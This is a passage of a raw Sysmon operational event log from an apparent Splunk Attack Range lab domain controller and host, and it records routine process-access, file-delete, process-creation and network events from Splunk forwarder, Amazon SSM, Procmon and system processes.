Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566A17B31B72470003C4665BD4FE96A6,SHA256=A7A8C0ECF37622C83B8788F1DDC560C5B119ADF16A6BA9D02D58A40502992FC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:16.665{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53496-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.489{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-135MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.291{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.291{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.291{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.275{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.275{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.275{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.275{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.878{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D276911209D560A3DF4BACF99CDF8CE7,SHA256=525521C909DDC732F4C18F2D695B7407A7B5858848288A65FCCC2338002A21BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:19.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=692260D7F425EAE1BD6D6284871EDB43,SHA256=36A700E22CB8705903EE66416C6B841354F2FAB5860DAE9C3DFEFE1FBD138FBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11E3-6216-2605-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-11E3-6216-2605-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.607{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11E3-6216-2605-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.393{C8EA50B7-11E3-6216-2605-000000003802}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000288935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:19.483{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-136MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.878{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1169DB73D653A618AABBCE88026A1F3,SHA256=4355DC81D8AEC5BB812B238942DC2B05D8FA28F481318C9E5EF2AC4CCCD396E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:20.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7495181A227E36D0900CCE8AC56673B0,SHA256=E6263B3A5EAEB79EE259D74CCC0FA4AB6E86669DCD8CEB6302C7B361966F7193,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.578{C8EA50B7-11E4-6216-2705-000000003802}66806684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.293{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11E4-6216-2705-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-11E4-6216-2705-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.278{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11E4-6216-2705-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.279{C8EA50B7-11E4-6216-2705-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000288945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:20.110{C8EA50B7-11E3-6216-2605-000000003802}66326636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.893{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 